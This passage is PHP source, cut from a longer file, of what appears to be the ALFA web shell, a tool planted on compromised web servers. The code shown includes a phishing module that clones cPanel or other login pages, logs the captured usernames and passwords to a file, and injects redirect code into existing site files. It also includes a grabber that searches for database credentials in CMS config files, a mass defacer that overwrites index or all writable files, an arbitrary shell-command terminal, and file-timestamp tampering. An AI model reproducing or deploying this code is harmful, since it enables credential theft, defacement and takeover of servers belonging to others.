	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
	<div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
        $clone_page = $_POST['alfa1'];
        $fake_root = $_POST['alfa2'];
        $logto = $_POST['alfa4'];
        $panel = $_POST['alfa5'];
        $inject_to = $_POST['alfa6'];
        $bind_on = $_POST['alfa7'];
        $count = $_POST['alfa8'];
        if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>') {
            echo __pre();
            $target = $clone_page;
            $curl = new AlfaCURL();
            $source_page = $curl->Send($target);
            if (!empty($source_page)) {
                $matched_form = "";
                if ($panel == "cpanel") {
                    if (preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)) {
                        $matched_form = $match[0];
                    }
                } else {
                    if (preg_match('#<form(.*?)>#', $source_page, $match)) {
                        $matched_form = $match[0];
                    }
                }
                if (!empty($matched_form)) {
                    $fake = "";
                    $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
                    $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
                    if ($panel == "cpanel") {
                        $port = "2083";
                    } else {
                        $target = str_replace(array("http://", "https://"), "", $target);
                        $port = explode(":", $target);
                        $port = $port[1];
                    }
                    if (substr($uri, 0, 1) == "/") {
                        $uri = substr($uri, 1);
                    }
                    $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
                    $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
                    if ($panel == "cpanel") {
                        $form = '<form novalidate id="login_form" action="' . $log_url . '" method="post" target="_top" style="visibility:">';
                    } else {
                        $form = '<form action="' . $log_url . '" method="post">';
                    }
                    $fake = str_replace($matched_form, $form, $source_page);
                    if (@(!is_dir($fake_root))) {
                        @mkdir($fake_root, 0777, true);
                    }
                    $cookie_name = "alfa_fakepage_counter" . rand(9999, 99999);
                    $post_user = 'user';
                    $post_pass = 'pass';
                    $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
                    if ($panel != "cpanel") {
                        $post_user = 'username';
                        $post_pass = 'password';
                        $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
                    }
                    $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["' . $post_user . '"];$pass = $_POST["' . $post_pass . '"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["' . $cookie_name . '"])){@setcookie("' . $cookie_name . '", 0, $cook_time, "/");$_COOKIE["' . $cookie_name . '"]=1;}if((int)$_COOKIE["' . $cookie_name . '"]>' . $count . '){@header("Location: /");exit;}@setcookie("' . $cookie_name . '", ((int)$_COOKIE["' . $cookie_name . '"] + 1), $cook_time, "/");$fp = @fopen("' . $logto . '", "a+");@fwrite($fp, $user . " : " . $pass . "\\n");fclose($fp);sleep(3);' . $resp_code . 'exit;}?>';
                    @file_put_contents($fake_root . '/log.php', $cpanel_log);
                    if ($panel == "cpanel") {
                        $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="' . $target . '/$2">', '<img class="main-logo" src="' . $target . '/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
                    }
                    @file_put_contents($fake_root . '/index.php', $fake);
                    $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["' . $cookie_name . '"]<' . $count . '){@include("' . $fake_root . '/index.php");exit;}?>';
                    $bind_on_code = '<?php if((int)$_COOKIE["' . $cookie_name . '"]<' . $count . '){@header("Location: ' . $uri . '");exit;}?>';
                    @file_put_contents($inject_to, $inject_code . "\n" . @file_get_contents($inject_to));
                    @file_put_contents($bind_on, $bind_on_code . "\n" . @file_get_contents($bind_on));
                    echo "success...!";
                } else {
                    echo "failed...!";
                }
            } else {
                echo "<div style='text-align:center;color:red;'>Cannot open the target...!</div>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaarchive_manager()
    {
        alfahead();
        $file = $_POST['alfa2'];
        if (!file_exists($file)) {
            $file = $GLOBALS['cwd'];
        }
        $rand_id = rand(9999, 999999);
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Archive Manager |</div></p>";
        echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
	<div class="txtfont">
	Archive file: <input size="50" id="target" type="text" name="file" value="' . $file . '">
	<input type="submit" name="btn" value=" "></div></form></center><br>';
        if ($_POST['alfa5'] == '>>') {
            echo '<hr><div style="margin-left: 12px;" archive_full="phar://' . $file . '" archive_name="' . basename($file) . '" id="archive_dir_' . $rand_id . '" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
            echo '<div style="padding: 10px;" id="archive_base_' . $rand_id . '">';
            __alfa_open_archive_file($file, $rand_id);
            echo "</div>";
        }
        echo "</div>";
        alfafooter();
    }
    function __alfa_open_archive_file($arch, $base_id = 0)
    {
        try {
            $files = array();
            $dirs = array();
            $archive = new PharData($arch);
            foreach ($archive as $file) {
                $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
                if ($file->isDir()) {
                    $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
                } else {
                    $file_size = @filesize($file->getPathname());
                    $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
                }
            }
            function __alfa_open_archive_usort($a, $b)
            {
                return strcmp(strtolower($a['name']), strtolower($b['name'])) * 1;
            }
            usort($dirs, "__alfa_open_archive_usort");
            usort($files, "__alfa_open_archive_usort");
            $files = array_merge($dirs, $files);
            echo "<table width=\"100%\" class=\"main\" cellspacing=\"0\" cellpadding=\"2\"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>";
            $icon = '<img class="archive-icons" src="' . findicon('..', 'dir') . '" width="30" height="30">';
            echo '<tr><th><a base_id="' . $base_id . '" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="' . dirname($arch . '.php') . '">' . $icon . '<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
            foreach ($files as $file) {
                $icon = '<img class="archive-icons" src="' . findicon($file['name'], $file['type']) . '" width="30" height="30">';
                if ($file["type"] == "dir") {
                    echo '<tr><th><a base_id="' . $base_id . '" class="archive-file-row" onclick="alfaOpenArchive(this);" path="' . $file["path"] . '" fname="' . $file["name"] . '">' . $icon . '<span class="archive-name archive-type-dir">| ' . $file["name"] . ' |</span></a><td>dir</td><td>' . $file["modify"] . '</td><td>-</td></tr>';
                } else {
                    echo "<tr><th><a base_id='" . $base_id . "' class='archive-file-row' onclick=\"editor('" . $file["path"] . "','auto','','','','file');\">" . $icon . "<span class='archive-name archive-type-file' fname='" . $file["name"] . "'>" . $file["name"] . "</span></a><td>" . alfaSize($file["size"]) . "</td><td>" . $file["modify"] . "</td><td>-</td></tr>";
                }
            }
            echo "</table>";
        } catch (Exception $e) {
            echo "0";
        }
    }
    function alfaopen_archive_dir()
    {
        $dir = $_POST["alfa1"];
        $base_id = $_POST["alfa2"];
        __alfa_open_archive_file($dir, $base_id);
    }
    function alfaconfig_grabber()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Config Grabber |</div></p>";
        echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
	<div class="txtfont">
	Dir: <input size="50" id="target" type="text" name="dir" value="' . $GLOBALS['cwd'] . '">
	Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
	<input type="submit" name="btn" value=" "></div></form></center><br>';
        $dir = $_POST['alfa2'];
        $ext = $_POST['alfa3'];
        if ($_POST['alfa5'] == '>>') {
            echo __pre();
            Alfa_ConfigGrabber($dir, $ext);
        }
        echo "</div>";
        alfafooter();
    }
    function Alfa_ConfigGrabber($dir, $ext)
    {
        $pattern = "#define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")password(?:'|\")\\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
        $db_files = array("wp-config.php", "configure.php", "config.inc.php", "configuration.php", "config.php", "conf.php", "dbclass.php", "class_core.php", "dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
        if (@is_readable($dir)) {
            $globFiles = @glob("{$dir}/*.{$ext}");
            $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR);
            $blacklist = array();
            foreach ($globDirs as $dir) {
                if (!@is_readable($dir) || @is_link($dir)) {
                    continue;
                }
                @Alfa_ConfigGrabber($dir, $ext);
            }
            foreach ($globFiles as $file) {
                $filee = @file_get_contents($file);
                if (preg_match($pattern, $filee)) {
                    echo "<div><span>{$file}</span> <a style='cursor:pointer;' onclick=\"editor('" . $file . "','auto','','','','file');\">[ View file ]</a></div>";
                }
            }
        }
    }
    function alfasearcher()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Searcher |</div></p><h3><a href=javascript:void(0) onclick=\"g('searcher',null,'file')\">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick=\"g('searcher',null,'str')\">| Find Files By Name | </a></h3></center>";
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'file') {
            echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="' . $GLOBALS['cwd'] . '">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
            $dir = $_POST['alfa2'];
            $ext = $_POST['alfa3'];
            $method = $_POST['alfa4'];
            if ($_POST['alfa5'] == '>>') {
                echo __pre();
                if (substr($dir, -1) == '/') {
                    $dir = substr($dir, 0, -1);
                }
                Alfa_Searcher($dir, trim($ext), $method);
            }
        }
        if ($_POST['alfa1'] == 'str') {
            echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
<div class="txtfont">
Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="' . $GLOBALS['cwd'] . '">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
            $dir = $_POST['alfa2'];
            $string = $_POST['alfa3'];
            $ext = $_POST['alfa5'];
            if (!empty($string) and !empty($dir) and $_POST['alfa4'] == '>>') {
                echo __pre();
                Alfa_StrSearcher($dir, $string, $ext, $_POST['alfa6']);
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaMassDefacer()
    {
        alfahead();
        AlfaNum(5, 6, 7, 8, 9, 10);
        echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
        echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
	Mass dir: <input size="50" id="target" type="text" name="massdir" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
	DefPage: <input size="50" type="text" name="defpage" value="' . htmlspecialchars($GLOBALS['cwd']) . '"></div> <input type="submit" name="btn" value=" "></center></p>
</form>';
        $dir = $_POST['alfa1'];
        $defpage = $_POST['alfa2'];
        $method = $_POST['alfa3'];
        $fCurrent = $GLOBALS['__file_path'];
        if ($_POST['alfa4'] == '>>') {
            if (!empty($dir)) {
                if (@is_dir($dir)) {
                    if (@is_readable($dir)) {
                        if (@is_file($defpage)) {
                            if ($dh = @opendir($dir)) {
                                echo __pre();
                                while (($file = @readdir($dh)) !== false) {
                                    if ($file == '..' || $file == '.') {
                                        continue;
                                    }
                                    $newfile = $dir . $file;
                                    if ($fCurrent == $newfile) {
                                        continue;
                                    }
                                    if (@is_dir($newfile)) {
                                        Alfa_ReadDir($newfile, $method, $defpage);
                                    } else {
                                        if (!@is_writable($newfile)) {
                                            continue;
                                        }
                                        if (!@is_readable($newfile)) {
                                            continue;
                                        }
                                        Alfa_Rewriter($newfile, $file, $defpage, $method);
                                    }
                                }
                                closedir($dh);
                            } else {
                                __alert('<font color="red">Error In OpenDir...</font>');
                            }
                        } else {
                            __alert('<font color="red">DefPage File NotFound...</font>');
                        }
                    } else {
                        __alert('<font color="red">Directory is not Readable...</font>');
                    }
                } else {
                    __alert('<font color="red">Mass Dir is Invalid Dir...</font>');
                }
            } else {
                __alert('<font color="red">Dir is Empty...</font>');
            }
        }
        echo "</div>";
        alfafooter();
    }
    function Alfa_ReadDir($dir, $method = '', $defpage = '')
    {
        if (!@is_readable($dir)) {
            return false;
        }
        if (@is_dir($dir)) {
            if ($dh = @opendir($dir)) {
                while (($file = readdir($dh)) !== false) {
                    if ($file == '..' || $file == '.') {
                        continue;
                    }
                    $newfile = $dir . '/' . $file;
                    if (@is_readable($newfile) && @is_dir($newfile)) {
                        Alfa_ReadDir($newfile, $method, $defpage);
                    }
                    if (@is_file($newfile)) {
                        if (!@is_readable($newfile)) {
                            continue;
                        }
                        Alfa_Rewriter($newfile, $file, $defpage, $method);
                    }
                }
                closedir($dh);
            }
        }
    }
    function Alfa_Rewriter($dir, $file, $defpage, $m = 'index')
    {
        if (!@is_writable($dir)) {
            return false;
        }
        if (!@is_readable($dir)) {
            return false;
        }
        $defpage = @file_get_contents($defpage);
        if ($m == 'index') {
            $indexs = array('index.php', 'index.htm', 'index.html', 'default.asp', 'default.aspx', 'index.asp', 'index.aspx', 'index.js');
            if (in_array(strtolower($file), $indexs)) {
                @file_put_contents($dir, $defpage);
                echo @is_file($dir) ? $dir . "<b><font color='red'>DeFaced...</b></font><br>" : '';
            }
        } elseif ($m == 'all') {
            @file_put_contents($dir, $defpage);
            echo @is_file($dir) ? $dir . "  <b><font color='red'>DeFaced...</b></font><br>" : '';
        }
    }
    function alfaGetDisFunc()
    {
        alfahead();
        echo "<div class=\"header\">";
        $disfun = @ini_get('disable_functions');
        $s = explode(',', $disfun);
        $f = array_unique($s);
        echo "<center><br><b><font color=\"#7CFC00\">Disable Functions</font></b><pre><table border=\"1\"><tr><td align=\"center\" style=\"background-color: green;color: white;width:5%\">#</td><td align=\"center\" style=\"background-color: green;color: white;\">Func Name</td></tr>";
        $i = 1;
        foreach ($f as $s) {
            $s = trim($s);
            if (function_exists($s) || !is_callable($s)) {
                continue;
            }
            echo '<tr><td align="center" style="background-color: black;">' . $i . '</td>';
            echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.' . str_replace('_', '-', $s) . '.php"><span class="disable_functions"><b>' . $s . '</b></span></a></td>';
            $i++;
        }
        echo "</table></center>";
        echo "</div>";
        alfafooter();
    }
    function Alfa_Create_A_Tag($action, $vals)
    {
        $nulls = array();
        foreach ($vals as $key => $val) {
            echo '<a href=javascript:void(0) onclick="g(\'' . $action . '\',';
            for ($i = 1; $i <= $val[1] - 1; $i++) {
                $nulls[] = 'null';
            }
            $f = implode(',', $nulls);
            echo $f . ',\'' . $val[0] . '\');return false;">| ' . $key . ' | </a>';
            unset($nulls);
        }
    }
    function Alfa_Searcher($dir, $ext, $method)
    {
        if (@is_readable($dir)) {
            if ($method == 'all') {
                $ext = '*';
            }
            if ($method == 'dirs') {
                $ext = '*';
            }
            $globFiles = @glob("{$dir}/*.{$ext}");
            $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR);
            $blacklist = array();
            foreach ($globDirs as $dir) {
                if (!@is_readable($dir) || @is_link($dir)) {
                    continue;
                }
                @Alfa_Searcher($dir, $ext, $method);
            }
            switch ($method) {
                case "files":
                    foreach ($globFiles as $file) {
                        if (@is_writable($file)) {
                            echo "{$file}<br>";
                        }
                    }
                    break;
                case "dirs":
                    foreach ($globFiles as $file) {
                        if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) {
                            echo dirname($file) . '<br>';
                            $blacklist[] = dirname($file);
                        }
                    }
                    break;
                case "all":
                    foreach ($globFiles as $file) {
                        echo $file . '<br>';
                    }
                    break;
            }
            unset($blacklist);
        }
    }
    function AlfaiFrameCreator($f, $width = '100%', $height = '600px')
    {
        return "<iframe src=\"ALFA_DATA/" . $f . '" width="' . $width . '" height="' . $height . '" frameborder="0"></iframe>';
    }
    class AlfaCURL
    {
        public $headers;
        public $user_agent;
        public $compression;
        public $cookie_file;
        public $proxy;
        public $path;
        public $ssl = true;
        public $curl_status = true;
        function __construct($cookies = false, $compression = 'gzip', $proxy = '')
        {
            if (!extension_loaded('curl')) {
                $curl_status = false;
                return false;
            }
            $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
            $this->headers[] = 'Connection: Keep-Alive';
            $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
            $this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
            $this->path = "ALFA_TEMPDIR/Alfa_cookies.txt";
            $this->compression = $compression;
            $this->proxy = $proxy;
            $this->cookies = $cookies;
            if ($this->cookies) {
                $this->cookie($this->path);
            }
        }
        function cookie($cookie_file)
        {
            if (_alfa_file_exists($cookie_file, false)) {
                $this->cookie_file = $cookie_file;
            } else {
                @fopen($cookie_file, 'w') or die($this->error('The cookie file could not be opened.'));
                $this->cookie_file = $cookie_file;
                @fclose($this->cookie_file);
            }
        }
        function Send($url, $method = "get", $data = "")
        {
            if (!$this->curl_status) {
                return false;
            }
            $process = curl_init($url);
            curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
            curl_setopt($process, CURLOPT_HEADER, 0);
            curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
            curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($process, CURLOPT_ENCODING, $this->compression);
            curl_setopt($process, CURLOPT_TIMEOUT, 30);
            if ($this->ssl) {
                curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false);
            }
            if ($this->cookies) {
                curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
                curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
            }
            if ($this->proxy) {
                curl_setopt($process, CURLOPT_PROXY, $this->proxy);
            }
            if ($method == 'post') {
                curl_setopt($process, CURLOPT_POSTFIELDS, $data);
                curl_setopt($process, CURLOPT_POST, 1);
                curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
            }
            $return = @curl_exec($process);
            curl_close($process);
            return $return;
        }
        function error($error)
        {
            echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>{$error}</div></center>";
            die;
        }
    }
    function getConfigHtml($cms)
    {
        $content = '';
        $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke", "phpbb" => "PHPBB", "mybb" => "MyBB", "drupal" => "Drupal", "smf" => "SMF");
        $content = "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
        foreach ($cms_array as $key => $val) {
            $content .= "<option value='{$key}' " . ($key == $cms ? 'selected=selected' : '') . ">{$val}</option>";
        }
        $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER['DOCUMENT_ROOT'] . "/' size='30' /> <button class='button'>GetConfig</button>";
        $content .= "</form>";
        return $content;
    }
    if (!function_exists('json_encode')) {
        function json_encode($a = false)
        {
            if (is_null($a)) {
                return "null";
            }
            if ($a === false) {
                return "false";
            }
            if ($a === true) {
                return "true";
            }
            if (is_scalar($a)) {
                if (is_float($a)) {
                    return floatval(str_replace(",", ".", strval($a)));
                }
                if (is_string($a)) {
                    static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\\"'));
                    return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
                } else {
                    return $a;
                }
            }
            $isList = true;
            for ($i = 0, reset($a); $i < count($a); $i++, next($a)) {
                if (key($a) !== $i) {
                    $isList = false;
                    break;
                }
            }
            $result = array();
            if ($isList) {
                foreach ($a as $v) {
                    $result[] = json_encode($v);
                }
                return '[' . join(',', $result) . ']';
            } else {
                foreach ($a as $k => $v) {
                    $result[] = json_encode($k) . ':' . json_encode($v);
                }
                return '{' . join(',', $result) . '}';
            }
        }
    }
    if (!function_exists('json_decode')) {
        function json_decode($json, $array = true)
        {
            $comment = false;
            $out = '$x=';
            for ($i = 0; $i < strlen($json); $i++) {
                if (!$comment) {
                    if ($json[$i] == '{' || $json[$i] == '[') {
                        $out .= ' array(';
                    } else {
                        if ($json[$i] == '}' || $json[$i] == ']') {
                            $out .= ')';
                        } else {
                            if ($json[$i] == ':') {
                                $out .= '=>';
                            } else {
                                $out .= $json[$i];
                            }
                        }
                    }
                } else {
                    $out .= $json[$i];
                }
                if ($json[$i] == '"') {
                    $comment = !$comment;
                }
            }
            eval($out . ';');
            return $x;
        }
    }
    function alfaterminalExec()
    {
        $pwd = "pwd";
        $seperator = ";";
        if ($GLOBALS['sys'] != 'unix') {
            $pwd = "cd";
            $seperator = "&";
        }
        if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
            $cmd = "cd '" . addslashes($_POST["c"]) . "'" . $seperator;
        }
        $current_path = '';
        if (preg_match("/cd[ ]{0,}(.*)[ ]{0,}" . $seperator . "|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)) {
            if (empty($match[1])) {
                $match[1] = $match[2];
            }
            $current_path = alfaEx("cd " . addslashes($match[1]) . $seperator . $pwd);
            $current_path = str_replace("\\", "/", $current_path);
        }
        $out = alfaEx($cmd . $_POST['alfa1'], true);
        $out = htmlspecialchars($out);
        echo json_encode(array("output" => convertBash($out), "path" => $current_path));
    }
    function convertBash($code)
    {
        $dictionary = array('[01;30m' => '<span style="color:black">', '[01;31m' => '<span style="color:red">', '[01;32m' => '<span style="color:green">', '[01;33m' => '<span style="color:yellow">', '[01;34m' => '<span style="color:blue">', '[01;35m' => '<span style="color:purple">', '[01;36m' => '<span style="color:cyan">', '[01;37m' => '<span style="color:white">', '[0m' => '</span>');
        $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
        return $htmlString;
    }
    function alfadoActions()
    {
        $chdir_fals = false;
        if (!@chdir($_POST['c'])) {
            $chdir_fals = true;
            $alfa_canruncmd = _alfa_can_runCommand(true, true);
        }
        if (isset($_POST['alfa1'])) {
            $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
        }
        if (isset($_POST['alfa2'])) {
            $_POST['alfa2'] = rawurldecode($_POST['alfa2']);
        }
        $action = $_POST["alfa3"];
        if ($action == "permission") {
            $perms = 0;
            $perm = $_POST["alfa2"];
            for ($i = strlen($perm) - 1; $i >= 0; --$i) {
                $perms += (int) $perm[$i] * pow(8, strlen($perm) - $i - 1);
            }
            if (@chmod($_POST['alfa1'], $perms)) {
                echo "done";
            } else {
                echo "no";
            }
            return;
        }
        if ($action == "rename" || $action == "move") {
            $alfa1_decoded = $_POST['alfa1'];
            if ($chdir_fals) {
                $_POST['alfa1'] = $_POST["c"] . "/" . $_POST["alfa1"];
            }
            $_POST['alfa1'] = trim($_POST['alfa1']);
            $alfa1_escape = addslashes($_POST["alfa1"]);
            if ($_POST["alfa3"] == "rename") {
                $_POST['alfa2'] = basename($_POST['alfa2']);
            }
            if (!empty($_POST['alfa2'])) {
                $cmd_rename = false;
                if ($chdir_fals && $alfa_canruncmd) {
                    if (_alfa_is_writable($_POST['alfa1'])) {
                        $cmd_rename = true;
                        $alfa1_escape = addslashes($alfa1_decoded);
                        alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa2']) . "'");
                    }
                }
                if (!file_exists($_POST['alfa2'])) {
                    if (@rename($_POST['alfa1'], $_POST['alfa2']) || $cmd_rename) {
                        echo "done";
                    } else {
                        echo "no";
                    }
                } else {
                    echo "no";
                }
            }
        } elseif ($action == "copy") {
            if (is_dir($_POST["alfa1"])) {
                $dir = str_replace('//', '/', $_POST["alfa1"]);
                $dir = explode('/', $dir);
                if (empty($dir[count($dir) - 1])) {
                    $name = $dir[count($dir) - 2];
                } else {
                    $name = $dir[count($dir) - 1];
                }
            } else {
                $name = basename($_POST["alfa1"]);
            }
            $dir = dirname($_POST["alfa1"]);
            if ($dir == ".") {
                $dir = $_POST["c"] . "/";
            }
            if (is_file($_POST["alfa1"])) {
                @copy($_POST["alfa1"], $_POST["alfa2"]);
                echo "done";
            } elseif (is_dir($_POST["alfa1"])) {
                if (!is_dir($_POST["alfa2"])) {
                    mkdir($_POST["alfa2"], 0755, true);
                }
                copy_paste($dir, $name, $_POST["alfa2"] . "/");
                echo "done";
            }
        } elseif ($action == "modify") {
            if (!empty($_POST['alfa1'])) {
                $time = strtotime($_POST['alfa1']);
                if ($time) {
                    $touched = false;
                    if ($chdir_fals && $alfa_canruncmd) {
                        alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa1'])) . "' '" . addslashes($_POST['alfa2']) . "'");
                        $touched = true;
                    }
                    if (!@touch($_POST['alfa2'], $time, $time) && !$touched) {
                        echo "no";
                    } else {
                        echo "ok";
                    }
                } else {
                    echo "badtime";
                }
            }
        }
    }
    function alfaget_flags()
    {
        $flags = array();
        if (function_exists("curl_version")) {
            $curl = new AlfaCURL();
            $server_addr = !@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"];
            $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
            $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
            if (strpos($flag2, "geoplugin") != false) {
                $flag = json_decode($flag, true);
                $flag2 = json_decode($flag2, true);
                if (!empty($flag['geoplugin_countryCode'])) {
                    $flags["server"]["name"] = $flag['geoplugin_countryName'];
                    $flags["server"]["code"] = $flag['geoplugin_countryCode'];
                }
                if (!empty($flag2['geoplugin_countryCode'])) {
                    $flags["client"]["name"] = $flag2['geoplugin_countryName'];
                    $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
                }
            }
        }
        echo json_encode($flags);
    }
    function alfaGetConfig()
    {
        $cms = $_POST['alfa1'];
        $path = trim($_POST['alfa2']);
